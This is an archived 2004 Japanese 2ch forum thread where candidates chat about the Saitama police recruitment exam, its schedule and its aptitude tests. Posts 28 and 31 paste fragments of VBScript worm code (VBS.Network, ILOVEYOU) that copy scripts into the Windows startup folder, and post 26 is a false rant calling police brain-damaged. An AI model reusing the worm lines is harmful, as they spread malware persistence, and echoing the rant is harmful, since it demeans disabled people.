5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【採用数】埼玉県警察官採用試験Part.5【610人】

1 :名無しピーポ君:04/05/24 23:23
前スレ
【警官1人で】埼玉県警察官受験スレ 4【753人担当】
http://society.2ch.net/test/read.cgi/police/1070457372/
【知事公約は】埼玉県警察官受験スレ3【警官増員】
http://society.2ch.net/test/read.cgi/police/1065669072/
part.2
http://society.2ch.net/test/read.cgi/police/1063169152/
埼玉県警5・18→6・10発表!Part.1
http://society.2ch.net/test/read.cgi/police/1055186727/

埼玉県警HP
http://www.police.pref.saitama.jp/kenkei/
県人事委員会HP
http://www.pref.saitama.jp/A33/BC00/ninyou/

2 :名無しピーポ君:04/05/24 23:24
第1次 試験日 5月23日(日)
試験種目 教養試験(国際捜査T類は専門試験T(記述式)を実施)・論(作)文試験・適性試験
第1次合格発表 6月15日(火)
第2次 試験日 6月19日(土)〜6月29日(火)のうち2日(6月26日(土)、27日(日)を除く)
試験種目 体力検査・身体検査・人物試験
※国際捜査T類は上記試験と専門試験U(口述式)を実施
最終合格発表 8月18日(水)
採用予定時期 平成16年10月1日(卒業見込みの人は、平成17年4月1日以降)


3 :超弩級低脳:04/05/24 23:29
余裕で3ゲット。そして不合格ゲット。

4 :名無しピーポ君:04/05/24 23:39
>>966
漏れ、芝工大だったけど謎の高音なんてしなかったぞ・・・

5 :名無しピーポ君:04/05/24 23:45
誰か自信のある人、模範解答よろしく

6 :名無しピーポ君:04/05/25 00:02
あと三週間

7 :名無しピーポ君:04/05/25 00:32
ラッキーの7ゲット!!
合格確定

8 :名無しピーポ君:04/05/25 10:42
>>1
乙。

9 :名無しピーポ君:04/05/25 12:12
あ、こんなところに>>1の通知表が!
┏━━┳━━┳━━┳━━┳━━┳━━┳━━┳━━┳━━┓
┃国語┃算数┃理科┃社会┃英語┃体育┃音楽┃人格┃2ch ┃
┣━━╋━━╋━━╋━━╋━━╋━━╋━━╋━━╋━━┫
┃  1 ┃  1 ┃  1 ┃  1 ┃  1 ┃  1 ┃  1 ┃  1 ┃  1 ┃
┗━━┻━━┻━━┻━━┻━━┻━━┻━━┻━━┻━━┛
                     ミチャダメー
  (´フ`)              (゚□゚) ──
 □ー               =│  ──
   ハ                ┌┴┘<1

10 :名無しピーポ君:04/05/25 13:41
馬鹿は警官の試験に合格して馬鹿の証明書をもらうわけですね。
正真正銘の馬鹿になれて、さぞ幸せでしょう。

11 :名無しピーポ君:04/05/25 19:14
もうだめぽ

12 :名無しピーポ君:04/05/26 00:05
12時過ぎたので、あと20日です。

13 :名無しピーポ君:04/05/26 01:07
埼玉は体力試験も楽だし、やることねーな。
で、YAHOOボイチャでの集団討論練習イベントはいつよ

14 :名無しピーポ君:04/05/26 01:32
集団討論に意味はない。
ただ、自分の意見を否定されてムキになる奴とか、
しゃべりだして、言葉につまって黙る奴などの馬鹿をはじくためのものだ。
まずメモ用紙を配られる時に試験の評価の仕方が説明されるが、
「発言の内容については評価の対象ではありません」と言われる。
つまり、ナイスコメントしようが、間違ったことを言おうが関係ないってこと。
目立とうとして平等な発言回数を逸脱して何度もしゃべる奴や、
他人の発言中にそれをさえぎってしゃべる奴、発言が無駄に長い奴等が減点対象だと思われ。
あと老婆心で教えておいてやるが、誰かが発言し終えた後AさんとBさんが挙手してAさんがしゃべる、
そして次にBさんと他の誰かが挙手したら、そいつはBさんに発言を譲るのがマナー。
試験官はそういうところみてますよ。
俺が俺がではダメだっつうこと。

15 :名無しさん@お腹いっぱい。:04/05/26 09:01
>>4
37教室は適性検査1の時に高音が響いて、
試験官にどうにかしてくれと言ってる奴がいた。
その後、漏れも気になってしょうがなかった。

16 :名無しピーポ君:04/05/26 09:09
       ┌┬┬┬┐                  
    ―――┴┴┴┴┴―――――、        
   /.  ̄ ̄ ̄//. ̄ ̄| || ̄ ̄ ̄||| ̄ ||.       
  /.    ∧// ∧ ∧| ||      |||   ||      
 [/____(゚_//[ ].゚Д゚,,) ||___|||   ||      
 ||_. *  _|_| ̄ ̄ ∪|.|.       |ヽ. _||.   
 lO|o―o|O゜.|二二 東|.|京 精神病院 ||.      
 | ∈口∋ ̄_l__l⌒l_|_____|_l⌒l_||     
   ̄ ̄`ー' ̄   `ー'  `ー'   `ー'       
          ∧                             
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| 警察浪人をお迎えにあがりました〜〜〜
|
\_______________________________ 



17 :名無しピーポ君:04/05/26 12:03
試験官が異常にふとっちょだった。

18 :名無しピーポ君:04/05/26 13:57
           /\       /i^ヽ
            ,>,-ヽ--、,,,/,,,/;;;;ノ
            / ,,-‐―、ヽヽヽ;<´   
            〔/     ))))ヾヽヽ     早くおまわりさんになりたいなぁ。うひゃひゃひゃひゃっ
            /.,,,,、、 ,ヽξ^\Ξ/     
           / ==/  .,==-   レi!
    (\_/).〔、 ,(_,、ノ( "",,ノ::: 6)       (\_/)  ))
   Σ(.;´Д`) λ:" ‐=‐^ン ...::::: |/        (;´Д`∩
    (.つ  つ λ:::::. .::.. ::...::::::/ λ        ( 二つノ
 ((  )  ) ,)  \::::::::::::::// . λ、       (_ ヽ,,ノ
    (_ィ,,__)    ̄| ̄      /~~ ̄⌒\(_イ__ノ
      |:"""| / ̄ ̄f´ ヾ、   ノ        /:"""/ 
      |   |/     \___/        /   /   
           高卒=アホ=負け組み

19 :名無しピーポ君:04/05/26 14:04
警官になって大きく変わること。

それは人に対する見方が変わることだ。
その人が違反をしてないか、犯罪を犯してないか。
つねに警官の立場でとらえてしまう。
学生時代の友人等、今までにかかわってきた人みんな。
休みの日でもつねにね。悲しいことに。

そしてもうひとつが、自分自身の行動が変わること。
休みの日でも、警官としての行動をとることを意識してしまう。

すなわち警察官になるということは、
一般人ではなくなる、ということである。
組織がそれを求めると同時に、仕事柄そうなってしまう。

それらが想像以上のストレスを生むことになる。
自然と楽しみは食べること、飲むことのみになる。
だから肥満の警官が多いのだ。

20 :名無しピーポ君:04/05/26 14:42
日曜日が今日並の暑さだったら死んでた

21 :名無しピーポ君:04/05/26 14:52
     曰   \  また一年勉強か…   受験仲間↓(合格) /
     | |      \      ∧_∧        ∧_∧     /
    ノ__丶 ∧_∧\ ハァ...( ;´Д`)≡3    (・∀・ )ププ…/__|
     ||負||(; ´Д`) \   |  ⊃ヽC      C/⊂  |.    /|||||
  _ ||け||./   [¢、)  \  、_ ( ) )     ( ( )_ノ..   / | ̄| ∧ ウウ・・・
  \ ||犬||∪ ̄ ̄. ̄ ̄\ \      ∧∧∧∧∧.   ... ./ |  |フT )
  ||\.`~~´ ((二゚。◎彡) \ \   <       >   /.  |  |⊂ | もうだめぽ…
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄   \  <     今 > ...../   |  | ∪
   .  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||      \<     年 > /
 今年も落ちちまったか・・・     <  の    も >/
―――――――――――――――<  予   不 >―――――――――――――――――
      ∧              ∧ <  感   合 >
     / ;  また落ちた…  /  <.  !!!   格 >
    /   ';          /   .<        >         ∧_∧∩ / ̄ ̄
   /    ;______/    ;/∨∨∨∨∨\        ( T∀T)ノ<先生!今年も
  /                    /         \  __/ノ   /   \__
 /  ┯━┯         ┯━┯ ./           \ \   ̄ ̄ ̄ ̄ ̄ ̄\
.|   ..)   ) _____  )   )/    /      ヽ  \||\           \
|   ...(   (  ;,      / (   (/.    /        ヽ  \ || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
|    .)   ) ;     /  )  /.. ∧ /∧       ∧ヽ∧\ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|   .(   (   :    /  (   / (  ⌒ ヽ      (  ⌒ ヽ \           ||
 |   )   )   ';   /    ) /  ∪  ノ ミ  彡  ∪  ノ   \
  \ (  (     ヽ/    ( /    ヽ_),)        し' l_ノ     \

22 :名無しピーポ君:04/05/26 18:58
つうかぶっちゃけ受験者何人なんだ?
例年通りなら半分近く合格だろ?
だれか教えてクレーーーーーーーーーーー!!!!!!

23 :名無しピーポ君:04/05/26 18:59
       ┌┬┬┬┐                  
    ―――┴┴┴┴┴―――――、        
   /.  ̄ ̄ ̄//. ̄ ̄| || ̄ ̄ ̄||| ̄ ||.       
  /.    ∧// ∧ ∧| ||      |||   ||      
 [/____(゚_//[ ].゚Д゚,,) ||___|||   ||      
 ||_. *  _|_| ̄ ̄ ∪|.|.       |ヽ. _||.   
 lO|o―o|O゜.|二二 東|.|京 精神病院 ||.      
 | ∈口∋ ̄_l__l⌒l_|_____|_l⌒l_||     
   ̄ ̄`ー' ̄   `ー'  `ー'   `ー'       
          ∧                             
/ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| 警察浪人をお迎えにあがりました〜〜〜
|
\_______________________________ 

24 :名無しピーポ君:04/05/26 22:30
>>22
例年通りだと、何人合格するんすかね?
逆に教えてクレーーーーーーーーーーー!!!!!!

25 :超弩級低脳:04/05/27 12:02
第1次合格発表 6月15日(火) ???オそーーーーーーーーーーーーーーーーーーーーーー

機械が採点するんじゃないの?生殺しだーーーーーーーー

26 :名無しピーポ君:04/05/27 12:51
これはあまり公にはされてませんが....

警察官っていうのはようするに頭がにぶくて危険な人が
なるんですよ。よくいたでしょ?掛け算の九九全部言えない
人とかアルファベットAからZまで言えないような人とか。
そういう知恵遅れというかある種の脳障害を持った人を優先的に
とるんですよ。こういう人たちがあちこちにちらばってたら危険
ですからね。で、警察学校で動物とまったく同じ調教をすると。
これで少しは安全になります。知能レベルは変わりませんよ。
あいかわらず動物一歩手前の知能レベルです。でもその後も公
の組織ですから監視できるんですよ。で、あんまりやばそうな
のがいたらヤクザ組織の立ち入りとかに連れてって殉職させると
まぁこうなっているわけですよ。交番とかでぼーっとしてる警官みると、
あんなんで給料貰っていいのかといきどおるかもしれませんが、
あの人たちは障害者なんですよ、脳の。
警察手帳は障害者手帳、給料は障害手当てだと考えればいいのです。
それに脳障害者なんか1つの組織にまとめて監視しといたほうがいいでしょ?
上に書いたようにやばくなったら殉職させちゃえばいいんだから。
というわけで警察の採用は知能が低い人、情緒に障害がある人を
優先しています。
まともな人はなれません。他のもっとまともな職に就きましょうね

27 :名無しピーポ君:04/05/27 13:07
>>25
そこに人為的操作が入るわけですよ

28 :名無しピーポ君:04/05/27 14:17
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

29 :名無しピーポ君:04/05/27 16:41
>>15
高音て、何系の音?漏れ、気付かなかったぞ

30 :名無しピーポ君:04/05/27 20:06
V類受けた人、試験日に受けた説明聞き忘れたのだけど、
二次試験の日程って公式ホームページの内容まんまだったっけ?

うろ覚えだが、多分一類と分けてるんだかなんだかでもうちょっと二次試験の
日程は公式ほどアバウトじゃなく、もうちょっと絞られてたような気がしたんだけど。

31 :名無しピーポ君:04/05/27 20:37
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)

c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

32 :名無しピーポ君:04/05/27 21:42
クレペリン検査の時、隣の席の奴が

「5・・・2・・・4・・・3・・・8・・・」

と口に出すものだから気になって気になって・・・・・


33 :名無しさん@お腹いっぱい。:04/05/27 22:14
>>29
結局なんの音かは、不明のまま。
試験官は機械音だろうって言ってたけど。
なんだったんだろう?
誰か知ってる?

34 :名無しピーポ君:04/05/27 22:20
俺初めてクレペリン検査受けたんだけど
あれってマジで拷問みたいだと思うんだけど
他の人はどうなんだろう?

35 :名無しピーポ君:04/05/27 23:37
>>34
だから人体実験だって言ってるだろ

36 :超弩級低脳:04/05/27 23:45
>>34
俺も初めて受けたけど途中で気を失いそうになった。意識が飛びそうに。
はい!次!だっけ。気合入ってるよあれ。
できが波線みたいになってしまったよ。周り少しみたけど俺よりできてた。
頭の弱さを再認した瞬間だったぜ!!

37 :名無しピーポ君:04/05/27 23:46
あれはいっぱいできた方がいいわけ?

38 :名無しピーポ君:04/05/27 23:50
>>37
京都スレの628〜632を参照するとよい。

39 :名無しピーポ君:04/05/28 00:10
32>>
(笑)そりゃ〜、近くにいたら嫌だな・・・

40 :名無しピーポ君:04/05/28 00:12
>>36
あれは合否にどれくらいのウエイトがあるのでしょうかね。

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)